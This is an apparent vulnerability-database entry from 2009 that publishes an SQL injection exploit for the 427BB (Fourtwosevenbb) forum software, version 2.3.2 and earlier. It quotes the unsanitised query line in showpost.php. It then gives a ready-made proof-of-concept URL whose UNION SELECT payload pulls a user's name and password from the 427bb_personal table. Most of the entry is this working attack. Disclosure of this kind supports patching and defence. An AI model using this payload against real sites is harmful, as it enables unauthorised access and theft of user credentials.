Lucene search
RootSSV:18392HistoryDec 04, 2009 - 12:00 a.m.
427BB Fourtwosevenbb <= 2.3.2 SQL Injection Exploit
2009-12-0400:00:00
Root
www.seebug.org
9
No description provided by source.
[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]
########################################################################
#Download Script : http://sourceforge.net/projects/fourtwosevenbb/files/
########################################################################
########################################################################
#3rr0r: ./fourtwosevenbb-2.3.2/showpost.php
#
# <?php
#line 118: $sql = "SELECT ID, UserName, Post, UTime, IP, InReplyTo, ThreadID From " . $t_prefix . "Posts WHERE ID=$post_id";
#line 119:
#line 120: $res = mysql_query($sql);
# ?>
########################################################################
########################################################################
#PoC : http://server/[path]/showpost.php?ForumID=1&post=[SQL]
# http://server/[path]/showpost.php?ForumID=1&post=1%20union%20select%201,UserName,3,4,5,Password,7%20FROM%20427bb_personal%20WHERE%20ID=1--
########################################################################
[ Gorontalo / 2009 ]